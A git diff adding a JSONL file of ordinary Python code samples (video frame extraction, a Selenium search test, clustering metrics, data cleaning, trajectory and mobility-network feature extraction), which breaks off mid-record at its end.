diff --git "a/1791.jsonl" "b/1791.jsonl" new file mode 100644--- /dev/null +++ "b/1791.jsonl" @@ -0,0 +1,783 @@ +{"seq_id":"352345357","text":"import argparse\nimport os\nimport cv2\nimport numpy as np\nfrom tqdm import tqdm\n\ndef split_video(video_path, output_dir):\n # Load input video\n cap = cv2.VideoCapture(video_path)\n fps = int(cap.get(cv2.CAP_PROP_FPS))\n frame_width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n frame_height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n length = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n\n for i in tqdm(range(length)):\n ret, img = cap.read()\n if img is None:\n continue\n\n out_fn = os.path.join(output_dir, \"{:06d}.jpg\".format(i))\n cv2.imwrite(out_fn, img)\n\n cap.release()\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-v', '--video_path', help='The video path')\n parser.add_argument('-o', '--output_dir', help='The output dir', default=\"./output\")\n args = parser.parse_args()\n\n if not os.path.exists(args.output_dir):\n os.makedirs(args.output_dir)\n\n split_video(args.video_path, args.output_dir)","sub_path":"preprocess/LabelMeTools/src/virat/split_video.py","file_name":"split_video.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"635506816","text":"import os\nimport time\n\n\nimport allure\nimport pytest\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\n\n\n@allure.feature('百度搜索模块测试')\nclass TestBaiduSearch:\n def get_dir(self):\n \"\"\"\n 获取当前项目地址\n :return:\n \"\"\"\n now_dir = os.getcwd()\n while True:\n now_dir = os.path.split(now_dir)\n if now_dir[1] == 'test_baidu_search':\n now_dir = os.path.join(now_dir[0], 'test_baidu_search')\n break\n now_dir = now_dir[0]\n return now_dir\n\n def setup(self):\n \"\"\"前置动作\"\"\"\n # driver_path = os.path.join(self.get_dir(),'plugin/windows/chromedriver.exe') # Windows下使用\n driver_path = os.path.join(self.get_dir(), 'plugin/linux/chromedriver') # linux下使用\n option = Options()\n option.add_argument(\"--headless\") # linux下使用无头浏览器需要添加这个参数\n option.add_argument(\"--no-sandbox\") # 表示不用跟用户运行chrome\n option.add_argument(\"--disable-dev-shm-usage\") #\n self.driver = webdriver.Chrome(executable_path=driver_path,chrome_options=option)\n self.driver.maximize_window()\n self.driver.implicitly_wait(5)\n\n def teardown(self):\n \"\"\"后置动作\"\"\"\n self.driver.quit()\n\n\n @allure.story('百度搜索测试用例')\n @pytest.mark.parametrize(\"name\", [(\"狗\"), (\"猫\"), (\"欧毅\")])\n def test_baidu_search(self, name):\n self.driver.get(\"https://www.baidu.com/\")\n time.sleep(5)\n self.driver.find_element(By.ID, \"kw\").send_keys(f\"{name}\")\n self.driver.find_element(By.ID, \"su\").click()\n time.sleep(5)\n r = self.driver.title\n assert r == f\"{name}_百度搜索\"\n","sub_path":"test_baidu_search.py","file_name":"test_baidu_search.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"68299983","text":"from __future__ import division\n\nimport sklearn\nimport numpy as np\nimport os\n\nfrom scipy.special import comb\n\n\ndef compute_a_i(contingency):\n # Return a 1xI matrix corresponding to the marginal total of data points in each of the I predicted clusters\n rep = np.sum(contingency, axis=1)\n return np.reshape(rep, (np.ma.size(rep), 1))\n\n\ndef compute_b_j(contingency):\n # Return a Jx1 matrix corresponding to the marginal total of data points in each of the J true clusters\n rep = np.sum(contingency, axis=0)\n return np.reshape(rep, (1, np.ma.size(rep)))\n\n\ndef pair_based_values(contingency):\n # Return the quadruplet (SS, SD, DS, DD) corresponding to the 4 categories of data pairs\n # For conveniency (since all the criteria originally use the TP, FP, FN, TN values), the name of these variables\n # in pair_based_values() and functions that use results of pair_based_values() will be tp, fp, fn, tn\n # (correspondance : tp <-> SS, fp <-> SD, fn <-> DS, tn <-> DD)\n a_i = compute_a_i(contingency)\n b_j = compute_b_j(contingency)\n N = sum(a_i)\n\n tp = np.sum(comb(contingency, 2))\n J_a_i = np.repeat(a_i, np.ma.size(b_j), axis=1)\n fp = np.sum(np.multiply(J_a_i - contingency, contingency))\n fp = 0.5 * fp\n I_b_j = np.repeat(b_j, np.ma.size(a_i), axis=0)\n fn = np.sum(np.multiply(I_b_j - contingency, contingency))\n fn = 0.5 * fn\n\n tn = np.sum(np.multiply(contingency, N - J_a_i - I_b_j + contingency))\n tn = 0.5 * tn\n\n return tp, fp, fn, tn\n\n\ndef compute_contingency(y_true, y_pred):\n # Custom calculation of contingency table, since adopted notation require IxJ contingency matrix and sklearn contingency\n # function produce JxI matrix\n tmp = np.transpose(sklearn.metrics.cluster.contingency_matrix(y_true, y_pred, sparse=False))\n return np.array(tmp, dtype='float64') # Cast to avoid overflow problems\n\ndef pair_sum_test(y_true, y_pred):\n # Simple test to check if the sum of pairs tp,fp,fn,tn from pair_based_values() is equal to\n # total possible pair : N comb 2\n contingency = compute_contingency(y_true, y_pred)\n tp, fp, fn, tn = pair_based_values(contingency)\n N = np.ma.size(y_true)\n pair_sum = tp + fp + fn + tn\n real_pair_number = comb(N, 2)\n print(\"(TP+FP+FN+TN, comb(N,2) = \", pair_sum, real_pair_number)\n\n\ndef normalize(matrix):\n # Input : Matrix of values (integer/float only), without header/footer/etc, and return a normalized matrix (by\n # feature, ie by column), using Z normalization\n instance_nb = np.size(matrix, axis=0)\n\n mean = np.mean(matrix, axis=0)\n mean = np.expand_dims(mean, 0)\n mean = np.repeat(mean, instance_nb, axis=0)\n\n std = np.std(matrix, axis=0)\n std = np.expand_dims(std, 0)\n std = np.repeat(std, instance_nb, axis=0)\n normalized_matrix = (matrix - mean) / std # Z normalization\n normalized_matrix = np.nan_to_num(normalized_matrix)\n return normalized_matrix\n\n\ndef formate():\n # Note : Function that need to be customized for each dataset that needs to be cleaned\n\n common_directory_original = \"C:/Users/Vincent/Desktop/Stage PFE/Phase 3 - Tests sur datasets/Datasets bruts de l'UCI/\"\n clean_data_directory = \"C:/Users/Vincent/Desktop/Stage PFE/Phase 3 - Tests sur datasets/Datasets propres/\"\n\n sub_directory = \"fertility\"\n filename = \"fertility_Diagnosis.txt\"\n\n\n file = common_directory_original + sub_directory + \"/\" + filename\n f = open(file, 'r')\n\n matrix = []\n header = False\n for line in f:\n if header:\n header = False\n else:\n if line.find(\"?\") == -1 and line.find(\"NaN\") == -1 and line.find(\";;\") == -1 :\n # line = line.replace(\"\\n\",\"\")\n # str = line[-13:]\n # print(str)\n # if str == \"1\\t0\\t0\\t0\\t0\\t0\\t0\" :\n # line = line[0:-13] + \"0\"\n # if str == \"0\\t1\\t0\\t0\\t0\\t0\\t0\" :\n # line = line[0:-13] + \"1\"\n # if str == \"0\\t0\\t1\\t0\\t0\\t0\\t0\" :\n # line = line[0:-13] + \"2\"\n # if str == \"0\\t0\\t0\\t1\\t0\\t0\\t0\" :\n # line = line[0:-13] + \"3\"\n # if str == \"0\\t0\\t0\\t0\\t1\\t0\\t0\" :\n # line = line[0:-13] + \"4\"\n # if str == \"0\\t0\\t0\\t0\\t0\\t1\\t0\" :\n # line = line[0:-13] + \"5\"\n # if str == \"0\\t0\\t0\\t0\\t0\\t0\\t1\" :\n # line = line[0:-13] + \"6\"\n\n line = line.replace(\"O\",\"0\")\n line = line.replace(\"N\",\"1\")\n\n matrix = matrix + [[float(num) for num in line.split(',')]]\n\n nump = np.array(matrix)\n f.close()\n features = nump[:,:-1]\n featuresN = normalize(features)\n classes = np.array(nump[:,-1])\n\n if os.path.isfile(common_directory_original + sub_directory + \"/\" + \"features\"):\n warning = input(\"Ecraser ? (y/n)\")\n if warning == \"n\":\n return\n np.savetxt(common_directory_original + sub_directory + \"/\" + \"features\", featuresN, delimiter=',')\n np.savetxt(common_directory_original + sub_directory + \"/\" + \"classes\", classes, delimiter=',', fmt=\"%i\")\n\n np.savetxt(clean_data_directory + sub_directory +\"_features\", featuresN, delimiter=',')\n np.savetxt(clean_data_directory + sub_directory + \"_classes\", classes, delimiter=',', fmt=\"%i\")\n\ndef load_csv(path):\n # Given a file in csv format (seperator : ',') , return a file\n file = open(path,'r')\n matrix = []\n for line in file:\n matrix = matrix + [[float(num) for num in line.split(',')]]\n file.close()\n return matrix\n\ndef save_csv(path,data):\n # Save a matrix into a csv file\n np.savetxt(path, data, delimiter=',',fmt=\"%i\")","sub_path":"utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":5736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"419580879","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 27 16:12:30 2022\n\n@author: stevenweisberg\n\"\"\"\nimport os\nimport glob\nimport pandas as pd\nimport xlrd\nimport numpy as np\n\nscriptDir = os.getcwd()\n\n# Expects that the data is one file up from the analysis script\nos.chdir(os.path.dirname(os.getcwd()))\nmasterDir = os.getcwd()\n\n\noutdir_backup = os.path.join(masterDir,'DSP_RawData','Script_Output_DO_NOT_TOUCH')\n\nfiles = glob.glob(outdir_backup + os.sep + '*.xlsx')\n\ntallies = pd.DataFrame(columns={'participant','success_40','success_60'})\n\nfor file in files:\n df = pd.read_excel(file)\n \n success_40 = df.groupby('Status')['ParticipantNo'].count()['Success']\n\n \n conds = [\n (df['Status'] == 'Success') & (df['Time Elapsed'] > 39.9),\n (df['Status'] == 'Success') & (df['Time Elapsed'] < 39.9),\n (df['Status'] == 'Failure')\n ]\n \n values = ['Failure','Success','Failure']\n \n \n df['Status_60'] = np.select(conds,values)\n \n try:\n success_60 = df.groupby('Status_60')['ParticipantNo'].count()['Success']\n except:\n success_60 = 0\n \n p_tallies = {'participant':df['ParticipantNo'][0],\n 'success_40':success_40,\n 'success_60':success_60}\n \n tallies = tallies.append(p_tallies,ignore_index=True)\n \nprint('h')","sub_path":"dspy/archive/tallySuccess.py","file_name":"tallySuccess.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"499480150","text":"import tkinter\nimport turtle\n\nsc = tkinter.Tk()\nsc.geometry(\"1000x1000+100+100\")\n\nfr4 = tkinter.Frame(sc, height=500, width=600, bd=4, bg=\"light green\", takefocus=\"\", relief=tkinter.SUNKEN)\n\nfr4.grid(row=2, column=2, sticky=(tkinter.N, tkinter.E, tkinter.W, tkinter.S))\n\n# Canvas\ncanvas = tkinter.Canvas(fr4, width=750, height=750)\ncanvas.pack()\n\n# Turtle\nturtle1 = turtle.RawTurtle(canvas)\nturtle1.color(\"black\")\nturtle1.shape(\"circle\")\n\n\ndef drag_handler(x, y):\n turtle1.ondrag(None) # disable event inside event handler\n turtle1.goto(x, y)\n print(x,y)\n turtle1.ondrag(drag_handler) # reenable event on event handler exit\n\nturtle1.ondrag(drag_handler)\n\nsc.mainloop()","sub_path":"Remove/draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"307304238","text":"import gzip\nimport json\nimport datetime\nimport numpy as np\nimport pandas as pd\nimport networkx as nx\n\nfrom collections import defaultdict\nfrom scipy.spatial.distance import cdist\nfrom scipy.spatial.distance import cosine\nfrom networkx.readwrite import json_graph\n\nfrom individual_mobility_network import entropy as calculate_entropy\nfrom mobility_distance_functions import spherical_distance\nfrom tak_quadtree import lon_lat_to_quadtree_path\n\n\nclass NumpyEncoder(json.JSONEncoder):\n \"\"\" Special json encoder for numpy types \"\"\"\n def default(self, obj):\n if isinstance(obj, (np.int_, np.intc, np.intp, np.int8, np.int16, np.int32, np.int64,\n np.uint8, np.uint16, np.uint32, np.uint64)):\n return int(obj)\n elif isinstance(obj, (np.float_, np.float16, np.float32, np.float64)):\n return float(obj)\n elif isinstance(obj, (np.ndarray,)):\n return obj.tolist()\n return json.JSONEncoder.default(self, obj)\n\n\ndef get_timeday(time):\n morning_from = datetime.datetime.strptime('06', '%H').time() # 6 hours\n afternoon_from = datetime.datetime.strptime('12', '%H').time() # 6 hours\n evening_from = datetime.datetime.strptime('18', '%H').time() # 4 hours\n night_from = datetime.datetime.strptime('22', '%H').time() # 8 hours\n if morning_from <= time < afternoon_from:\n return 0\n elif afternoon_from <= time < evening_from:\n return 1\n elif evening_from <= time < night_from:\n return 2\n else:\n return 3\n\n\ndef get_trjectory_features(trajectories):\n\n km_list = list()\n traveltime_list = list()\n speed_list = list()\n\n traj_per_day = defaultdict(int)\n km_per_day = defaultdict(float)\n traveltime_per_day = defaultdict(float)\n max_speed_per_day = dict()\n min_speed_per_day = dict()\n\n traj_per_timeday = defaultdict(int)\n km_per_timeday = defaultdict(float)\n traveltime_per_timeday = defaultdict(float)\n speed_per_timeday = defaultdict(list)\n\n for traj in trajectories.values():\n km = traj.length()\n duration = traj.duration()\n speed = km / (duration/3600)\n day = traj.start_time().date()\n time = traj.start_time().time()\n timeday = get_timeday(time)\n\n km_list.append(km)\n traveltime_list.append(duration)\n speed_list.append(speed)\n\n traj_per_day[day] += 1\n km_per_day[day] += km\n traveltime_per_day[day] += duration\n max_speed_per_day[day] = max(speed, max_speed_per_day[day]) if day in max_speed_per_day else speed\n min_speed_per_day[day] = min(speed, min_speed_per_day[day]) if day in min_speed_per_day else speed\n\n traj_per_timeday[timeday] += 1\n km_per_timeday[timeday] += km\n traveltime_per_timeday[timeday] += duration\n speed_per_timeday[timeday].append(speed)\n\n features = {\n 'tot_traj': len(trajectories),\n 'tot_km': np.sum(km_list),\n 'tot_traveltime': np.sum(traveltime_list),\n 'avg_km': np.mean(km_list),\n 'avg_traveltime': np.mean(traveltime_list),\n 'avg_speed': np.mean(speed_list),\n 'std_km': np.std(km_list),\n 'std_traveltime': np.std(traveltime_list),\n 'std_speed': np.std(speed_list),\n\n 'avg_traj_per_day': np.mean(list(traj_per_day.values())),\n 'avg_km_per_day': np.mean(list(km_per_day.values())),\n 'avg_traveltime_per_day': np.mean(list(traveltime_per_day.values())),\n 'avg_max_speed_per_day': np.mean(list(max_speed_per_day.values())),\n 'avg_min_speed_per_day': np.mean(list(min_speed_per_day.values())),\n 'std_traj_per_day': np.std(list(traj_per_day.values())),\n 'std_km_per_day': np.std(list(km_per_day.values())),\n 'std_traveltime_per_day': np.std(list(traveltime_per_day.values())),\n 'std_max_speed_per_day': np.std(list(max_speed_per_day.values())),\n 'std_min_speed_per_day': np.std(list(min_speed_per_day.values())),\n\n 'morning_traj': traj_per_timeday.get(0, 0),\n 'afternoon_traj': traj_per_timeday.get(1, 0),\n 'evening_traj': traj_per_timeday.get(2, 0),\n 'night_traj': traj_per_timeday.get(3, 0),\n 'morning_ntraj': traj_per_timeday.get(0, 0) / len(trajectories),\n 'afternoon_ntraj': traj_per_timeday.get(1, 0) / len(trajectories),\n 'evening_ntraj': traj_per_timeday.get(2, 0) / len(trajectories),\n 'night_ntraj': traj_per_timeday.get(3, 0) / len(trajectories),\n\n 'morning_km': km_per_timeday.get(0, 0.0),\n 'afternoon_km': km_per_timeday.get(1, 0.0),\n 'evening_km': km_per_timeday.get(2, 0.0),\n 'night_km': km_per_timeday.get(3, 0.0),\n 'morning_nkm': km_per_timeday.get(0, 0.0) / np.sum(km_list),\n 'afternoon_nkm': km_per_timeday.get(1, 0.0) / np.sum(km_list),\n 'evening_nkm': km_per_timeday.get(2, 0.0) / np.sum(km_list),\n 'night_nkm': km_per_timeday.get(3, 0.0) / np.sum(km_list),\n\n 'morning_ttime': traveltime_per_timeday.get(0, 0.0),\n 'afternoon_ttime': traveltime_per_timeday.get(1, 0.0),\n 'evening_ttime': traveltime_per_timeday.get(2, 0.0),\n 'night_ttime': traveltime_per_timeday.get(3, 0.0),\n 'morning_nttime': traveltime_per_timeday.get(0, 0.0) / np.sum(traveltime_list),\n 'afternoon_nttime': traveltime_per_timeday.get(1, 0.0) / np.sum(traveltime_list),\n 'evening_nttime': traveltime_per_timeday.get(2, 0.0) / np.sum(traveltime_list),\n 'night_nttime': traveltime_per_timeday.get(3, 0.0) / np.sum(traveltime_list),\n\n 'morning_avg_speed': np.mean(speed_per_timeday[0]) if 0 in speed_per_timeday else -1,\n 'afternoon_avg_speed': np.mean(speed_per_timeday[1]) if 1 in speed_per_timeday else -1,\n 'evening_avg_speed': np.mean(speed_per_timeday[2]) if 2 in speed_per_timeday else -1,\n 'night_avg_speed': np.mean(speed_per_timeday[3]) if 3 in speed_per_timeday else -1,\n 'morning_std_speed': np.std(speed_per_timeday[0]) if 0 in speed_per_timeday else -1,\n 'afternoon_std_speed': np.std(speed_per_timeday[1]) if 1 in speed_per_timeday else -1,\n 'evening_std_speed': np.std(speed_per_timeday[2]) if 2 in speed_per_timeday else -1,\n 'night_std_speed': np.std(speed_per_timeday[3]) if 3 in speed_per_timeday else -1,\n\n }\n\n return features\n\n\ndef get_events_features(events):\n nbr_events_per_day = defaultdict(int)\n nbr_events_per_time = defaultdict(int)\n\n nbr_events_type = defaultdict(int)\n nbr_event_type_per_day = defaultdict(lambda: defaultdict(int))\n nbr_event_type_per_time = defaultdict(lambda: defaultdict(int))\n\n nbr_event_location = defaultdict(int)\n nbr_event_location_per_day = defaultdict(lambda: defaultdict(int))\n nbr_event_location_per_time = defaultdict(lambda: defaultdict(int))\n\n nbr_events_type_locations = defaultdict(lambda: defaultdict(int))\n\n durations_list = list()\n durations_event_type = defaultdict(list)\n durations_event_location = defaultdict(list)\n\n avg_acc_list = list()\n avg_acc_event_type = defaultdict(list)\n avg_acc_event_location = defaultdict(list)\n\n max_acc_list = list()\n max_acc_event_type = defaultdict(list)\n max_acc_event_location = defaultdict(list)\n\n angle_list = list()\n angle_event_type = defaultdict(list)\n angle_event_location = defaultdict(list)\n\n for event in events.values():\n day = event['date'].date()\n time = event['date'].time()\n event_type = event['event_type']\n duration = event['duration']\n location = event['location_type']\n avg_acc = event['avg_acc']\n max_acc = event['max_acc']\n angle = event['angle']\n\n nbr_events_per_day[day] += 1\n nbr_events_per_time[time] += 1\n\n nbr_events_type[event_type] += 1\n nbr_event_type_per_day[event_type][day] += 1\n nbr_event_type_per_time[event_type][time] += 1\n\n nbr_event_location[location] += 1\n nbr_event_location_per_day[location][day] += 1\n nbr_event_location_per_time[location][time] += 1\n\n nbr_events_type_locations[event_type][location] += 1\n\n durations_list.append(duration)\n durations_event_type[event_type].append(duration)\n durations_event_location[location].append(duration)\n\n avg_acc_list.append(avg_acc)\n avg_acc_event_type[event_type].append(avg_acc)\n avg_acc_event_location[location].append(avg_acc)\n\n max_acc_list.append(max_acc)\n max_acc_event_type[event_type].append(max_acc)\n max_acc_event_location[location].append(max_acc)\n\n angle_list.append(angle)\n angle_event_type[event_type].append(angle)\n angle_event_location[location].append(angle)\n\n features = {\n 'tot_events': len(events),\n 'avg_events_per_day': np.mean(list(nbr_events_per_day.values())),\n 'std_events_per_day': np.std(list(nbr_events_per_day.values())),\n 'avg_events_per_time': np.mean(list(nbr_events_per_time.values())),\n 'std_events_per_time': np.std(list(nbr_events_per_time.values())),\n 'tot_duration': np.sum(durations_list),\n 'avg_duration': np.mean(durations_list),\n 'std_duration': np.std(durations_list),\n 'avg_avg_acc': np.mean(avg_acc_list),\n 'std_avg_acc': np.std(avg_acc_list),\n 'avg_max_acc': np.mean(max_acc_list),\n 'std_max_acc': np.std(max_acc_list),\n 'avg_angle': np.mean(angle_list),\n 'std_angle': np.std(angle_list),\n }\n\n for event_type in ['Q', 'B', 'A', 'C', 'stop', 'start']:\n features['tot_events_%s' % event_type] = nbr_events_type.get(event_type, 0)\n features['tot_events_p%s' % event_type] = \\\n nbr_events_type.get(event_type, 0) / len(events) if len(events) > 0 else 0.0\n features['avg_events_per_day_%s' % event_type] = np.mean(\n list(nbr_event_type_per_day[event_type].values())) if event_type in nbr_event_type_per_day else -1\n features['avg_events_per_time_%s' % event_type] = np.mean(\n list(nbr_event_type_per_time[event_type].values())) if event_type in nbr_event_type_per_time else -1\n features['std_events_per_day_%s' % event_type] = np.std(\n list(nbr_event_type_per_day[event_type].values())) if event_type in nbr_event_type_per_day else -1\n features['std_events_per_time_%s' % event_type] = np.std(\n list(nbr_event_type_per_time[event_type].values())) if event_type in nbr_event_type_per_time else -1\n\n features['tot_duration_%s' % event_type] = np.sum(\n durations_event_type[event_type]) if event_type in durations_event_type else 0\n features['tot_duration_p%s' % event_type] = np.sum(\n durations_event_type[event_type]) / np.sum(durations_list) if event_type in durations_event_type else 0\n features['avg_duration_%s' % event_type] = np.mean(\n durations_event_type[event_type]) if event_type in durations_event_type else -1\n features['std_duration_%s' % event_type] = np.std(\n durations_event_type[event_type]) if event_type in durations_event_type else -1\n\n features['avg_avg_acc_%s' % event_type] = np.mean(\n avg_acc_event_type[event_type]) if event_type in avg_acc_event_type else -1\n features['std_avg_acc_%s' % event_type] = np.std(\n avg_acc_event_type[event_type]) if event_type in avg_acc_event_type else -1\n\n features['avg_max_acc_%s' % event_type] = np.mean(\n max_acc_event_type[event_type]) if event_type in max_acc_event_type else -1\n features['std_max_acc_%s' % event_type] = np.std(\n max_acc_event_type[event_type]) if event_type in max_acc_event_type else -1\n\n features['avg_angle_%s' % event_type] = np.mean(\n angle_event_type[event_type]) if event_type in angle_event_type else -1\n features['std_angle_%s' % event_type] = np.std(\n angle_event_type[event_type]) if event_type in angle_event_type else -1\n\n for location in ['0', '1', '2']:\n features['tot_events_loc%s' % location] = nbr_event_location.get(location, 0)\n features['tot_events_ploc%s' % location] = \\\n nbr_event_location.get(location, 0) / len(events) if len(events) > 0 else 0.0\n features['avg_events_per_day_loc%s' % location] = np.mean(\n list(nbr_event_location_per_day[location].values())) if location in nbr_event_location_per_day else -1\n features['avg_events_per_time_loc%s' % location] = np.mean(\n list(nbr_event_location_per_time[location].values())) if location in nbr_event_location_per_time else -1\n features['std_events_per_day_loc%s' % location] = np.std(\n list(nbr_event_location_per_day[location].values())) if location in nbr_event_location_per_day else -1\n features['std_events_per_time_loc%s' % location] = np.std(\n list(nbr_event_location_per_time[location].values())) if location in nbr_event_location_per_time else -1\n\n features['tot_duration_loc%s' % location] = np.sum(\n durations_event_location[location]) if location in durations_event_location else 0\n features['tot_duration_ploc%s' % location] = np.sum(\n durations_event_location[location]) / np.sum(durations_list) if location in durations_event_location else 0\n features['avg_duration_loc%s' % location] = np.mean(\n durations_event_location[location]) if location in durations_event_location else -1\n features['std_duration_loc%s' % location] = np.std(\n durations_event_location[location]) if location in durations_event_location else -1\n\n features['avg_avg_acc_loc%s' % location] = np.mean(\n avg_acc_event_location[location]) if location in avg_acc_event_location else -1\n features['std_avg_acc_loc%s' % location] = np.std(\n avg_acc_event_location[location]) if location in avg_acc_event_location else -1\n\n features['avg_max_acc_loc%s' % location] = np.mean(\n max_acc_event_location[location]) if location in max_acc_event_location else -1\n features['std_max_acc_loc%s' % location] = np.std(\n max_acc_event_location[location]) if location in max_acc_event_location else -1\n\n features['avg_angle_loc%s' % location] = np.mean(\n angle_event_location[location]) if location in angle_event_location else -1\n features['std_angle_loc%s' % location] = np.std(\n angle_event_location[location]) if location in angle_event_location else -1\n\n for event_type in ['Q', 'B', 'A', 'C', 'stop', 'start']:\n if event_type in nbr_events_type_locations:\n for location in ['0', '1', '2']:\n if location in nbr_events_type_locations[event_type]:\n features['tot_events_type_%s_loc%s' % (event_type, location)] = \\\n nbr_events_type_locations[event_type][location]\n features['ptot_events_type_%s_loc%s' % (event_type, location)] = \\\n nbr_events_type_locations[event_type][location] / len(events)\n else:\n features['tot_events_type_%s_loc%s' % (event_type, location)] = 0\n features['ptot_events_type_%s_loc%s' % (event_type, location)] = 0.0\n else:\n for location in ['0', '1', '2']:\n features['tot_events_type_%s_loc%s' % (event_type, location)] = 0\n features['ptot_events_type_%s_loc%s' % (event_type, location)] = 0.0\n\n return features\n\n\ndef string2timedelta(s):\n if isinstance(s, str):\n t = datetime.datetime.strptime(s, '%H:%M:%S.%f') if '.' in s else datetime.datetime.strptime(s, '%H:%M:%S')\n return datetime.timedelta(hours=t.hour, minutes=t.minute, seconds=t.second)\n else:\n return s\n\n\ndef get_imn_temporal_features(imn_list, loc_dist_thr=100):\n\n imn_keys_sorted = sorted(list(imn_list.keys()))\n\n imn_key0 = imn_keys_sorted[0]\n imn_key1 = imn_keys_sorted[-1]\n imn0 = imn_list[imn_key0]\n imn1 = imn_list[imn_key1]\n if imn0 is None or imn1 is None:\n features = {\n 'delta_locations': np.nan,\n 'delta_movements': np.nan,\n 'delta_reg_locations': np.nan,\n 'delta_rg': np.nan,\n 'jaccard': np.nan,\n 'cosine': np.nan,\n 'jaccard_mov': np.nan,\n 'cosine_mov': np.nan,\n }\n\n return features\n\n delta_locations = imn1['n_locs'] - imn0['n_locs']\n delta_movements = imn1['n_movs'] - imn0['n_movs']\n delta_reg_locations = imn1['n_reg_locs'] - imn0['n_reg_locs']\n delta_rg = imn1['rg'] - imn0['rg']\n\n imn0loc = np.array([np.array(v) for v in imn0['location_prototype'].values()])\n imn1loc = np.array([np.array(v) for v in imn1['location_prototype'].values()])\n loc0 = np.arange(0, len(imn0loc))\n loc1 = np.arange(0, len(imn1loc)) + max(loc0) + 1\n sup0 = np.array([lf['loc_support'] for lid, lf in imn0['location_features'].items()])\n sup1 = np.array([lf['loc_support'] for lid, lf in imn1['location_features'].items()])\n\n graph0 = imn0['graph']\n graph1 = imn1['graph']\n if not isinstance(graph0, nx.DiGraph):\n graph0 = json_graph.node_link_graph(imn0['graph'], directed=True, multigraph=False,\n attrs={'link': 'edges', 'source': 'from', 'target': 'to'})\n\n if not isinstance(graph1, nx.DiGraph):\n graph1 = json_graph.node_link_graph(imn1['graph'], directed=True, multigraph=False,\n attrs={'link': 'edges', 'source': 'from', 'target': 'to'})\n\n sup0mov = np.array([mf['mov_support'] for mid, mf in imn0['mov_features'].items()])\n sup1mov = np.array([mf['mov_support'] for mid, mf in imn1['mov_features'].items()])\n\n dmatrix = cdist(imn0loc, imn1loc, metric=spherical_distance)\n mapping = dict()\n mapping_loc = dict()\n for j, i in enumerate(np.argmin(dmatrix, axis=0)):\n if dmatrix[i][j] < loc_dist_thr:\n if i not in mapping or dmatrix[i][j] < dmatrix[i][mapping[i]]:\n mapping[i] = j\n mapping_loc[loc0[i]] = loc1[j]\n\n for lid in loc0:\n if lid not in mapping_loc:\n mapping_loc[lid] = lid\n\n loc0to1set = set([mapping_loc[lid] for lid in loc0])\n loc1set = set(loc1)\n jaccard = 1 - len(loc0to1set & loc1set) / len(loc0to1set | loc1set)\n\n sup0remap = np.zeros(max(loc1) + 1)\n sup1remap = np.zeros(max(loc1) + 1)\n for i, v in enumerate(sup0):\n sup0remap[mapping_loc[i]] = v\n for j, v in enumerate(sup1):\n sup1remap[loc1[j]] = v\n\n cosined = cosine(sup0remap, sup1remap)\n graph0to1 = nx.relabel_nodes(graph0, mapping_loc, copy=True)\n mov0to1set = set(graph0to1.edges())\n mov1set = set(graph1.edges())\n jaccard_mov = 1 - len(mov0to1set & mov1set) / len(mov0to1set | mov1set)\n\n sup0mov_remap = np.zeros(len(mov0to1set | mov1set))\n sup1mov_remap = np.zeros(len(mov0to1set | mov1set))\n for lflt in graph0.edges():\n lflt_key = lflt\n if isinstance(list(imn0['location_from_to_movement'].keys())[0], str):\n lflt_key = str(lflt)\n mid = imn0['location_from_to_movement'][lflt_key]\n lflt1 = (mapping_loc[lflt[0]], mapping_loc[lflt[1]])\n index = list(graph0to1.edges()).index(lflt1)\n sup0mov_remap[index] = sup0mov[mid]\n for lflt in graph1.edges():\n lflt_key = lflt\n if isinstance(list(imn1['location_from_to_movement'].keys())[0], str):\n lflt_key = str(lflt)\n mid = imn1['location_from_to_movement'][lflt_key]\n index = list(graph1.edges()).index(lflt)\n sup1mov_remap[index] = sup1mov[mid]\n cosined_mov = cosine(sup0mov_remap, sup1mov_remap)\n\n features = {\n 'delta_locations': delta_locations,\n 'delta_movements': delta_movements,\n 'delta_reg_locations': delta_reg_locations,\n 'delta_rg': delta_rg,\n 'jaccard': jaccard,\n 'cosine': cosined,\n 'jaccard_mov': jaccard_mov,\n 'cosine_mov': cosined_mov,\n }\n\n return features\n\n\ndef get_imn_features(imn_list, event_traj2evntlist):\n\n nbr_locations = list()\n nbr_movements = list()\n nbr_reg_locations = list()\n nbr_reg_movements = list()\n radius_of_gyration = list()\n regular_radius_of_gyration = list()\n entropy = list()\n rentropy = list()\n avg_mov_length = list()\n std_mov_length = list()\n avg_mov_duration = list()\n std_mov_duration = list()\n avg_reg_mov_length = list()\n std_reg_mov_length = list()\n avg_reg_mov_duration = list()\n std_reg_mov_duration = list()\n\n density = list()\n triangles = list()\n clustering_coefficient = list()\n degree = list()\n indegree = list()\n outdegree = list()\n diameter = list()\n eccentricity = list()\n assortativity = list()\n\n l1_count = list()\n l2_count = list()\n l3_count = list()\n l1_indegree = list()\n l2_indegree = list()\n l3_indegree = list()\n l1_outdegree = list()\n l2_outdegree = list()\n l3_outdegree = list()\n l1_dcentrality = list()\n l2_dcentrality = list()\n l3_dcentrality = list()\n l1_bcentrality = list()\n l2_bcentrality = list()\n l3_bcentrality = list()\n l1_events = defaultdict(list)\n l2_events = defaultdict(list)\n l3_events = defaultdict(list)\n\n l1l2_count = list()\n l2l1_count = list()\n l1l3_count = list()\n l3l1_count = list()\n l2l3_count = list()\n l3l2_count = list()\n l1l2_betweenness = list()\n l2l1_betweenness = list()\n l1l3_betweenness = list()\n l3l1_betweenness = list()\n l2l3_betweenness = list()\n l3l2_betweenness = list()\n l1l2_events = defaultdict(list)\n l2l1_events = defaultdict(list)\n l1l3_events = 